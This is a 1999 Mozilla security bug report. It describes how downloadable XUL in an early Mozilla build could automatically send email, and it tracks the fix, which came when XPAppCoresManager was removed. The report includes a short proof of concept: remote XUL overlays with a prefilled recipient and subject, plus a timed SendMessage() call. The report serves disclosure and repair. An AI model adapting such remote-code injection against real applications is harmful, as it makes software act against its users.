Closed
Bug 12934
Opened 25 years ago
Closed 25 years ago
Downloadable XUL allows automatically sending email
Categories
(Core :: Security, defect, P3)
Tracking
VERIFIED
FIXED
M13
People
(Reporter: joro, Assigned: norrisboyd)
There is a security vulnerability in build 1999082116 (guess others) which
allows automatically sending email using downloadable XUL.
[I could not make Messenger send a message even from Messenger in this build,
but the demonstration opens a TCP connection to port 25 of the SMTP server and
this is enough for me.]
Demonstration is available at: http://www.nat.bg/~joro/mozilla/msg/send.html
The code is:
In addressingWidgetOverlay.xul the following is modified:
<html:input id="msgRecipient#1" value="nobodyx@nosuchdomain.com" ...
In messengercompose.xul the following is modified:
<?xul-overlay
href="http://www.nat.bg/~joro/mozilla/msg/addressingWidgetOverlay.xul"?>
.....
<html:input id="msgSubject" value="Test for automatically sending messages"
type="text" flex="80%" onkeyup="SetComposeWindowTitle(event.which);"/>
.....
setTimeout("alert('Trying to send message');SendMessage();",20000);
Assignee
Updated•25 years ago
Status: NEW → ASSIGNED
Summary: Downloadable XUL allows automatically sending of email → Downloadable XUL allows automatically sending email
Assignee
Comment 1•25 years ago
Another use of XPAppCoresManager.
Assignee
Updated•25 years ago
Target Milestone: M11
Assignee
Comment 2•25 years ago
Move security bugs from M11 to M13; needed for beta but not for dogfood.
Assignee
Updated•25 years ago
Status: ASSIGNED → RESOLVED
Closed: 25 years ago
Resolution: --- → FIXED
Assignee
Comment 3•25 years ago
XPAppCoresManager finally died, closing this security hole.
Bulk moving all Browser Security bugs to new Security: General component. The
previous Security component for Browser will be deleted.
Component: Security → Security: General